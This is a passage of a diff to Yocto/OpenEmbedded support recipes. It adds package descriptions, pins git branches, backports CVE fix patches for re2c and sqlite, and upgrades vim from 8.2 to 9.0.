148- for (size_t i = 0; i < nre; ++i) {
149- size += estimate(res[i]) + 1;
150- }
151- return size;
152+ std::vector<StackItem> stack;
153+
154+ const size_t nre = res.size();
155+ //DASSERT(nre > 0);
156+ size_t size = nre - 1;
157+
158+ for (size_t i = 0; i < nre; ++i) {
159+ size += estimate_re_size(res[i], stack) + 1;
160+ }
161+
162+ return size;
163 }
164
165 } // namespace re2c
166
diff --git a/meta/recipes-support/re2c/re2c_1.0.1.bb b/meta/recipes-support/re2c/re2c_1.0.1.bb
index 35200ecde8..ca5c33f151 100644
--- a/meta/recipes-support/re2c/re2c_1.0.1.bb
+++ b/meta/recipes-support/re2c/re2c_1.0.1.bb
@@ -1,11 +1,17 @@
1SUMMARY = "Tool for writing very fast and very flexible scanners" 1SUMMARY = "Tool for writing very fast and very flexible scanners"
2HOMEPAGE = "http://re2c.sourceforge.net/" 2DESCRIPTION = "A free and open-source lexer generator for C, C++ and Go. It compiles regular expressions to determinisitic finite automata and encodes the automata in the form of a program in the target language. Unlike any other such tool, re2c focuses on generating high efficient code for regular expression matching. As a result this allows a much broader range of use than any traditional lexer."
3HOMEPAGE = "http://re2c.org/"
4BUGTRACKER = "https://github.com/skvadrik/re2c/issues"
3AUTHOR = "Marcus Börger <helly@users.sourceforge.net>" 5AUTHOR = "Marcus Börger <helly@users.sourceforge.net>"
4SECTION = "devel" 6SECTION = "devel"
5LICENSE = "PD" 7LICENSE = "PD"
6LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a" 8LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a"
7 9
8SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz" 10SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz \
11file://CVE-2018-21232-1.patch \
12file://CVE-2018-21232-2.patch \
13file://CVE-2018-21232-3.patch \
14file://CVE-2018-21232-4.patch"
9SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8" 15SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8"
10SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c" 16SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c"
11UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases" 17UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases"
diff --git a/meta/recipes-support/rng-tools/rng-tools/rngd.service b/meta/recipes-support/rng-tools/rng-tools/rngd.service
index aaaaa29074..f296a99e1f 100644
--- a/meta/recipes-support/rng-tools/rng-tools/rngd.service
+++ b/meta/recipes-support/rng-tools/rng-tools/rngd.service
@@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon
3DefaultDependencies=no 3DefaultDependencies=no
4After=systemd-udev-settle.service 4After=systemd-udev-settle.service
5Before=sysinit.target shutdown.target 5Before=sysinit.target shutdown.target
6Wants=systemd-udev-settle.service
6Conflicts=shutdown.target 7Conflicts=shutdown.target
7 8
8[Service] 9[Service]
diff --git a/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
index b8c6f022f3..58b58fbb3c 100644
--- a/meta/recipes-support/rng-tools/rng-tools_6.9.bb
+++ b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
9DEPENDS = "sysfsutils" 9DEPENDS = "sysfsutils"
10 10
11SRC_URI = "\ 11SRC_URI = "\
12 git://github.com/nhorman/rng-tools.git \ 12 git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \
13 file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \ 13 file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \
14 file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \ 14 file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \
15 file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \ 15 file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \
diff --git a/meta/recipes-support/serf/serf_1.3.9.bb b/meta/recipes-support/serf/serf_1.3.9.bb
index 2fbf96f997..3276d40df6 100644
--- a/meta/recipes-support/serf/serf_1.3.9.bb
+++ b/meta/recipes-support/serf/serf_1.3.9.bb
@@ -1,4 +1,9 @@
1SUMMARY = "High-Performance Asynchronous HTTP Client Library" 1SUMMARY = "High-Performance Asynchronous HTTP Client Library"
2DESCRIPTION = "The Apache Serf library is a C-based HTTP client library built upon the Apache \
3Portable Runtime (APR) library. It multiplexes connections, running the \
4read/write communication asynchronously. Memory copies and transformations are \
5kept to a minimum to provide high performance operation."
6HOMEPAGE = "http://serf.apache.org/"
2SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \ 7SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
3 file://norpath.patch \ 8 file://norpath.patch \
4 file://env.patch \ 9 file://env.patch \
diff --git a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
index 7a060b09ad..05c7d32965 100644
--- a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
+++ b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Shared MIME type database and specification" 1SUMMARY = "Shared MIME type database and specification"
2DESCRIPTION = "The shared-mime-info package contains the core database of common types and the update-mime-database command used to extend it. It requires glib2 to be installed for building the update command. Additionally, it uses intltool for translations, though this is only a dependency for the maintainers."
2HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info" 3HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info"
3SECTION = "base" 4SECTION = "base"
4 5
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
7 8
8DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native" 9DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native"
9 10
10SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https" 11SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master"
11SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a" 12SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a"
12PV = "1.15" 13PV = "1.15"
13S = "${WORKDIR}/git" 14S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35525.patch b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
new file mode 100644
index 0000000000..27d81d42d9
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
@@ -0,0 +1,21 @@
1From: drh <drh@noemail.net>
2Date: Thu, 20 Feb 2020 14:08:51 +0000
3Subject: [PATCH] Early-out on the INTERSECT query processing following an
4 error.
5
6Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
7CVE: CVE-2020-35525
8Signed-off-by: Virendra Thakur <virendrak@kpit.com>
9---
10Index: sqlite-autoconf-3310100/sqlite3.c
11===================================================================
12--- sqlite-autoconf-3310100.orig/sqlite3.c
13+++ sqlite-autoconf-3310100/sqlite3.c
14@@ -130767,6 +130767,7 @@ static int multiSelect(
15 /* Generate code to take the intersection of the two temporary
16 ** tables.
17 */
18+ if( rc ) break;
19 assert( p->pEList );
20 iBreak = sqlite3VdbeMakeLabel(pParse);
21 iCont = sqlite3VdbeMakeLabel(pParse);
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35527.patch b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
new file mode 100644
index 0000000000..d1dae389b0
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
@@ -0,0 +1,22 @@
1From: dan <dan@noemail.net>
2Date: Mon, 26 Oct 2020 13:24:36 +0000
3Subject: [PATCH] Fix a problem with ALTER TABLE for views that have a nested
4 FROM clause. Ticket [f50af3e8a565776b].
5
6Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
7CVE: CVE-2020-35527
8Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
9---
10Index: sqlite-autoconf-3310100/sqlite3.c
11===================================================================
12--- sqlite-autoconf-3310100.orig/sqlite3.c
13+++ sqlite-autoconf-3310100/sqlite3.c
14@@ -133110,7 +133110,7 @@ static int selectExpander(Walker *pWalke
15 pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
16 sqlite3TokenInit(&sColname, zColname);
17 sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
18- if( pNew && (p->selFlags & SF_NestedFrom)!=0 ){
19+ if( pNew && (p->selFlags & SF_NestedFrom)!=0 && !IN_RENAME_OBJECT ){
20 struct ExprList_item *pX = &pNew->a[pNew->nExpr-1];
21 sqlite3DbFree(db, pX->zEName);
22 if( pSub ){
diff --git a/meta/recipes-support/sqlite/files/CVE-2021-20223.patch b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
new file mode 100644
index 0000000000..e9d2e04d30
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
@@ -0,0 +1,23 @@
1From d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b Mon Sep 17 00:00:00 2001
2From: dan <dan@noemail.net>
3Date: Mon, 26 Oct 2020 13:24:36 +0000
4Subject: [PATCH] Prevent fts5 tokenizer unicode61 from considering '\0' to be
5 a token characters, even if other characters of class "Cc" are.
6
7FossilOrigin-Name: b7b7bde9b7a03665e3691c6d51118965f216d2dfb1617f138b9f9e60e418ed2f
8
9CVE: CVE-2021-20223
10Upstream-Status: Backport [https://github.com/sqlite/sqlite/commit/d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b.patch]
11Comment: Removed manifest, manifest.uuid and fts5tok1.test as these files are not present in the amalgamated source code
12Signed-Off-by: Sana.Kazi@kpit.com
13---
14--- a/sqlite3.c 2022-09-09 13:54:30.010768197 +0530
15+++ b/sqlite3.c 2022-09-09 13:56:25.458769142 +0530
16@@ -227114,6 +227114,7 @@
17 }
18 iTbl++;
19 }
20+ aAscii[0] = 0; /* 0x00 is never a token character */
21 }
22
23 /*
diff --git a/meta/recipes-support/sqlite/files/CVE-2022-35737.patch b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
new file mode 100644
index 0000000000..341e002913
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
@@ -0,0 +1,29 @@
1From 2bbf4c999dbb4b520561a57e0bafc19a15562093 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 2 Sep 2022 11:22:29 +0530
4Subject: [PATCH] CVE-2022-35737
5
6Upstream-Status: Backport [https://www.sqlite.org/src/info/aab790a16e1bdff7]
7CVE: CVE-2022-35737
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 sqlite3.c | 3 ++-
11 1 file changed, 2 insertions(+), 1 deletion(-)
12
13diff --git a/sqlite3.c b/sqlite3.c
14index f664217..33dfb78 100644
15--- a/sqlite3.c
16+++ b/sqlite3.c
17@@ -28758,7 +28758,8 @@ SQLITE_API void sqlite3_str_vappendf(
18 case etSQLESCAPE: /* %q: Escape ' characters */
19 case etSQLESCAPE2: /* %Q: Escape ' and enclose in '...' */
20 case etSQLESCAPE3: { /* %w: Escape " characters */
21- int i, j, k, n, isnull;
22+ i64 i, j, k, n;
23+ int isnull;
24 int needQuote;
25 char ch;
26 char q = ((xtype==etSQLESCAPE3)?'"':'\''); /* Quote character */
27--
282.25.1
29
diff --git a/meta/recipes-support/sqlite/files/CVE-2023-7104.patch b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
new file mode 100644
index 0000000000..01ff29ff5e
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
@@ -0,0 +1,46 @@
1From eab426c5fba69d2c77023939f72b4ad446834e3c Mon Sep 17 00:00:00 2001
2From: dan <Dan Kennedy>
3Date: Thu, 7 Sep 2023 13:53:09 +0000
4Subject: [PATCH] Fix a buffer overread in the sessions extension that could occur when processing a corrupt changeset.
5
6Upstream-Status: Backport [https://sqlite.org/src/info/0e4e7a05c4204b47]
7CVE: CVE-2023-7104
8Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
9---
10 sqlite3.c | 18 +++++++++++-------
11 1 file changed, 11 insertions(+), 7 deletions(-)
12
13diff --git a/sqlite3.c b/sqlite3.c
14index 972ef18..c645ac8 100644
15--- a/sqlite3.c
16+++ b/sqlite3.c
17@@ -203301,15 +203301,19 @@ static int sessionReadRecord(
18 }
19 }
20 if( eType==SQLITE_INTEGER || eType==SQLITE_FLOAT ){
21- sqlite3_int64 v = sessionGetI64(aVal);
22- if( eType==SQLITE_INTEGER ){
23- sqlite3VdbeMemSetInt64(apOut[i], v);
24+ if( (pIn->nData-pIn->iNext)<8 ){
25+ rc = SQLITE_CORRUPT_BKPT;
26 }else{
27- double d;
28- memcpy(&d, &v, 8);
29- sqlite3VdbeMemSetDouble(apOut[i], d);
30+ sqlite3_int64 v = sessionGetI64(aVal);
31+ if( eType==SQLITE_INTEGER ){
32+ sqlite3VdbeMemSetInt64(apOut[i], v);
33+ }else{
34+ double d;
35+ memcpy(&d, &v, 8);
36+ sqlite3VdbeMemSetDouble(apOut[i], d);
37+ }
38+ pIn->iNext += 8;
39 }
40- pIn->iNext += 8;
41 }
42 }
43 }
44--
452.25.1
46
diff --git a/meta/recipes-support/sqlite/sqlite3.inc b/meta/recipes-support/sqlite/sqlite3.inc
index 07614bdb3e..1adc0eba66 100644
--- a/meta/recipes-support/sqlite/sqlite3.inc
+++ b/meta/recipes-support/sqlite/sqlite3.inc
@@ -1,4 +1,5 @@
1SUMMARY = "Embeddable SQL database engine" 1SUMMARY = "Embeddable SQL database engine"
2DESCRIPTION = "A library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day"
2HOMEPAGE = "http://www.sqlite.org" 3HOMEPAGE = "http://www.sqlite.org"
3SECTION = "libs" 4SECTION = "libs"
4 5
diff --git a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
index 877e80f5a3..0e7bcfa5a7 100644
--- a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
+++ b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
@@ -13,6 +13,11 @@ SRC_URI = "http://www.sqlite.org/2020/sqlite-autoconf-${SQLITE_PV}.tar.gz \
13 file://CVE-2020-13630.patch \ 13 file://CVE-2020-13630.patch \
14 file://CVE-2020-13631.patch \ 14 file://CVE-2020-13631.patch \
15 file://CVE-2020-13632.patch \ 15 file://CVE-2020-13632.patch \
16 file://CVE-2022-35737.patch \
17 file://CVE-2020-35525.patch \
18 file://CVE-2020-35527.patch \
19 file://CVE-2021-20223.patch \
20 file://CVE-2023-7104.patch \
16 " 21 "
17SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125" 22SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125"
18SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae" 23SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae"
diff --git a/meta/recipes-support/taglib/taglib_1.11.1.bb b/meta/recipes-support/taglib/taglib_1.11.1.bb
index f4e288295d..165bccadc1 100644
--- a/meta/recipes-support/taglib/taglib_1.11.1.bb
+++ b/meta/recipes-support/taglib/taglib_1.11.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for reading and editing the meta-data of popular audio formats" 1SUMMARY = "Library for reading and editing the meta-data of popular audio formats"
2DESCRIPTION = "Platform-independent library (tested on Windows/Linux) for reading and writing metadata in media files, including video, audio, and photo formats. This is a convenient one-stop-shop to present or tag all your media collection, regardless of which format/container these might use. You can read/write the standard or more common tags/properties of a media, or you can also create and retrieve your own custom tags."
2SECTION = "libs/multimedia" 3SECTION = "libs/multimedia"
3HOMEPAGE = "http://taglib.github.io/" 4HOMEPAGE = "http://taglib.github.io/"
4LICENSE = "LGPLv2.1 | MPL-1.1" 5LICENSE = "LGPLv2.1 | MPL-1.1"
diff --git a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
index 63a7b78f12..2fc11dbdc2 100644
--- a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
+++ b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
@@ -16,11 +16,11 @@ Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
16 src/Makefile | 14 ++++---------- 16 src/Makefile | 14 ++++----------
17 1 file changed, 4 insertions(+), 10 deletions(-) 17 1 file changed, 4 insertions(+), 10 deletions(-)
18 18
19diff --git a/src/Makefile b/src/Makefile 19Index: git/src/Makefile
20index f2fafa4dc..7148d4bd9 100644 20===================================================================
21--- a/src/Makefile 21--- git.orig/src/Makefile
22+++ b/src/Makefile 22+++ git/src/Makefile
23@@ -2845,16 +2845,10 @@ auto/pathdef.c: Makefile auto/config.mk 23@@ -3101,16 +3101,10 @@ auto/pathdef.c: Makefile auto/config.mk
24 -@echo '#include "vim.h"' >> $@ 24 -@echo '#include "vim.h"' >> $@
25 -@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@ 25 -@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@
26 -@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@ 26 -@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@
@@ -41,6 +41,3 @@ index f2fafa4dc..7148d4bd9 100644
41 -@sh $(srcdir)/pathdef.sh 41 -@sh $(srcdir)/pathdef.sh
42 42
43 GUI_GTK_RES_INPUTS = \ 43 GUI_GTK_RES_INPUTS = \
44--
452.17.1
46
diff --git a/meta/recipes-support/vim/files/disable_acl_header_check.patch b/meta/recipes-support/vim/files/disable_acl_header_check.patch
index 33089162b4..533138245d 100644
--- a/meta/recipes-support/vim/files/disable_acl_header_check.patch
+++ b/meta/recipes-support/vim/files/disable_acl_header_check.patch
@@ -13,11 +13,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
13 src/configure.ac | 3 ++- 13 src/configure.ac | 3 ++-
14 1 file changed, 2 insertions(+), 1 deletion(-) 14 1 file changed, 2 insertions(+), 1 deletion(-)
15 15
16diff --git a/src/configure.ac b/src/configure.ac 16Index: git/src/configure.ac
17index 2d409b3ca06a..dbcaf6140263 100644 17===================================================================
18--- a/src/configure.ac 18--- git.orig/src/configure.ac
19+++ b/src/configure.ac 19+++ git/src/configure.ac
20@@ -3257,7 +3257,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h string.h \ 20@@ -3292,7 +3292,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h strin
21 sys/systeminfo.h locale.h sys/stream.h termios.h \ 21 sys/systeminfo.h locale.h sys/stream.h termios.h \
22 libc.h sys/statfs.h poll.h sys/poll.h pwd.h \ 22 libc.h sys/statfs.h poll.h sys/poll.h pwd.h \
23 utime.h sys/param.h sys/ptms.h libintl.h libgen.h \ 23 utime.h sys/param.h sys/ptms.h libintl.h libgen.h \
@@ -26,7 +26,7 @@ index 2d409b3ca06a..dbcaf6140263 100644
26 sys/access.h sys/sysinfo.h wchar.h wctype.h) 26 sys/access.h sys/sysinfo.h wchar.h wctype.h)
27 27
28 dnl sys/ptem.h depends on sys/stream.h on Solaris 28 dnl sys/ptem.h depends on sys/stream.h on Solaris
29@@ -3886,6 +3886,7 @@ AC_ARG_ENABLE(acl, 29@@ -3974,6 +3974,7 @@ AC_ARG_ENABLE(acl,
30 , [enable_acl="yes"]) 30 , [enable_acl="yes"])
31 if test "$enable_acl" = "yes"; then 31 if test "$enable_acl" = "yes"; then
32 AC_MSG_RESULT(no) 32 AC_MSG_RESULT(no)
@@ -34,6 +34,3 @@ index 2d409b3ca06a..dbcaf6140263 100644
34 AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"], 34 AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"],
35 AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl" 35 AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl"
36 AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),) 36 AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),)
37--
382.7.4
39
diff --git a/meta/recipes-support/vim/files/no-path-adjust.patch b/meta/recipes-support/vim/files/no-path-adjust.patch
index 05c2d803f6..9d6da80913 100644
--- a/meta/recipes-support/vim/files/no-path-adjust.patch
+++ b/meta/recipes-support/vim/files/no-path-adjust.patch
@@ -7,9 +7,11 @@ Upstream-Status: Pending
7 7
8Signed-off-by: Joe Slater <joe.slater@windriver.com> 8Signed-off-by: Joe Slater <joe.slater@windriver.com>
9 9
10--- a/src/Makefile 10Index: git/src/Makefile
11+++ b/src/Makefile 11===================================================================
12@@ -2507,11 +2507,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_ 12--- git.orig/src/Makefile
13+++ git/src/Makefile
14@@ -2565,11 +2565,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
13 rm -rf $$cvs; \ 15 rm -rf $$cvs; \
14 fi 16 fi
15 -chmod $(FILEMOD) $(DEST_TOOLS)/* 17 -chmod $(FILEMOD) $(DEST_TOOLS)/*
diff --git a/meta/recipes-support/vim/files/racefix.patch b/meta/recipes-support/vim/files/racefix.patch
deleted file mode 100644
index 48dca44cad..0000000000
--- a/meta/recipes-support/vim/files/racefix.patch
+++ /dev/null
@@ -1,33 +0,0 @@
1The creation of the LINGUAS file is duplicated for each desktop file
2which can lead the commands to race against each other. Rework
3the makefile to avoid this as the expense of leaving the file on disk.
4
5Upstream-Status: Pending
6RP 2021/2/15
7
8Index: git/src/po/Makefile
9===================================================================
10--- git.orig/src/po/Makefile
11+++ git/src/po/Makefile
12@@ -165,17 +165,16 @@ $(PACKAGE).pot: ../*.c ../if_perl.xs ../
13 po/gvim.desktop.in po/vim.desktop.in
14 mv -f ../$(PACKAGE).po $(PACKAGE).pot
15
16-vim.desktop: vim.desktop.in $(POFILES)
17+LINGUAS:
18 echo $(LANGUAGES) | tr " " "\n" |sed -e '/\./d' | sort > LINGUAS
19+
20+vim.desktop: vim.desktop.in $(POFILES) LINGUAS
21 $(MSGFMT) --desktop -d . --template vim.desktop.in -o tmp_vim.desktop
22- rm -f LINGUAS
23 if command -v desktop-file-validate; then desktop-file-validate tmp_vim.desktop; fi
24 mv tmp_vim.desktop vim.desktop
25
26-gvim.desktop: gvim.desktop.in $(POFILES)
27- echo $(LANGUAGES) | tr " " "\n" |sed -e '/\./d' | sort > LINGUAS
28+gvim.desktop: gvim.desktop.in $(POFILES) LINGUAS
29 $(MSGFMT) --desktop -d . --template gvim.desktop.in -o tmp_gvim.desktop
30- rm -f LINGUAS
31 if command -v desktop-file-validate; then desktop-file-validate tmp_gvim.desktop; fi
32 mv tmp_gvim.desktop gvim.desktop
33
diff --git a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
index 37914d4cd9..5284ba45b6 100644
--- a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
+++ b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
@@ -14,11 +14,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
14 src/configure.ac | 7 +++++++ 14 src/configure.ac | 7 +++++++
15 1 file changed, 7 insertions(+) 15 1 file changed, 7 insertions(+)
16 16
17diff --git a/src/configure.ac b/src/configure.ac 17Index: git/src/configure.ac
18index 0ee86ad..64736f0 100644 18===================================================================
19--- a/src/configure.ac 19--- git.orig/src/configure.ac
20+++ b/src/configure.ac 20+++ git/src/configure.ac
21@@ -3192,11 +3192,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [int x __attribute__((unused));], 21@@ -3264,11 +3264,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [in
22 AC_MSG_RESULT(no)) 22 AC_MSG_RESULT(no))
23 23
24 dnl Checks for header files. 24 dnl Checks for header files.
@@ -37,6 +37,3 @@ index 0ee86ad..64736f0 100644
37 37
38 AC_HEADER_DIRENT 38 AC_HEADER_DIRENT
39 39
40--
412.7.4
42
diff --git a/meta/recipes-support/vim/vim-tiny_8.2.bb b/meta/recipes-support/vim/vim-tiny_9.0.bb
index e4c26d23f6..e4c26d23f6 100644
--- a/meta/recipes-support/vim/vim-tiny_8.2.bb
+++ b/meta/recipes-support/vim/vim-tiny_9.0.bb
diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index d57f784da5..6d62bd67af 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -1,29 +1,37 @@
1SUMMARY = "Vi IMproved - enhanced vi editor" 1SUMMARY = "Vi IMproved - enhanced vi editor"
2DESCRIPTION = "Vim is a greatly improved version of the good old UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, script language, etc. There is also a Graphical User Interface (GUI) available."
2SECTION = "console/utils" 3SECTION = "console/utils"
3 4
5HOMEPAGE = "https://www.vim.org/"
6BUGTRACKER = "https://github.com/vim/vim/issues"
7
4DEPENDS = "ncurses gettext-native" 8DEPENDS = "ncurses gettext-native"
5# vimdiff doesn't like busybox diff 9# vimdiff doesn't like busybox diff
6RSUGGESTS_${PN} = "diffutils" 10RSUGGESTS_${PN} = "diffutils"
11
7LICENSE = "vim" 12LICENSE = "vim"
8LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a" 13LIC_FILES_CHKSUM = "file://LICENSE;md5=d1a651ab770b45d41c0f8cb5a8ca930e"
9 14
10SRC_URI = "git://github.com/vim/vim.git \ 15SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
11 file://disable_acl_header_check.patch \ 16 file://disable_acl_header_check.patch \
12 file://vim-add-knob-whether-elf.h-are-checked.patch \ 17 file://vim-add-knob-whether-elf.h-are-checked.patch \
13 file://0001-src-Makefile-improve-reproducibility.patch \ 18 file://0001-src-Makefile-improve-reproducibility.patch \
14 file://no-path-adjust.patch \ 19 file://no-path-adjust.patch \
15 file://racefix.patch \ 20 "
16" 21
17SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44" 22PV .= ".2190"
23SRCREV = "6a950da86d7a6eb09d5ebeab17657986420d07ac"
18 24
19# Do not consider .z in x.y.z, as that is updated with every commit 25# Do not consider .z in x.y.z, as that is updated with every commit
20UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0" 26UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
27# Ignore that the upstream version .z in x.y.z is always newer
28UPSTREAM_VERSION_UNKNOWN = "1"
21 29
22S = "${WORKDIR}/git" 30S = "${WORKDIR}/git"
23 31
24VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}" 32VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}"
25 33
26inherit autotools-brokensep update-alternatives mime-xdg 34inherit autotools-brokensep update-alternatives mime-xdg pkgconfig
27 35
28CLEANBROKEN = "1" 36CLEANBROKEN = "1"
29 37
@@ -32,29 +40,24 @@ do_configure () {
32 cd src 40 cd src
33 rm -f auto/* 41 rm -f auto/*
34 touch auto/config.mk 42 touch auto/config.mk
43 # git timestamps aren't reliable, so touch the shipped .po files so they aren't regenerated
44 touch -c po/cs.cp1250.po po/ja.euc-jp.po po/ja.sjis.po po/ko.po po/pl.UTF-8.po po/pl.cp1250.po po/ru.cp1251.po po/sk.cp1250.po po/uk.cp1251.po po/zh_CN.po po/zh_CN.cp936.po po/zh_TW.po
45 # ru.cp1251.po uses CP1251 rather than cp1251, fix that
46 sed -i -e s/CP1251/cp1251/ po/ru.cp1251.po
35 aclocal 47 aclocal
36 autoconf 48 autoconf
37 cd .. 49 cd ..
38 oe_runconf 50 oe_runconf
39 touch src/auto/configure 51 touch src/auto/configure
40 touch src/auto/config.mk src/auto/config.h 52 touch src/auto/config.mk src/auto/config.h
53 # need a native tool, not a target one
54 ${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr
41} 55}
42 56
43do_compile() { 57PACKAGECONFIG ??= "\
44 # We do not support fully / correctly the following locales. Attempting
45 # to use these with msgfmt in order to update the ".desktop" files exposes
46 # this problem and leads to the compile failing.
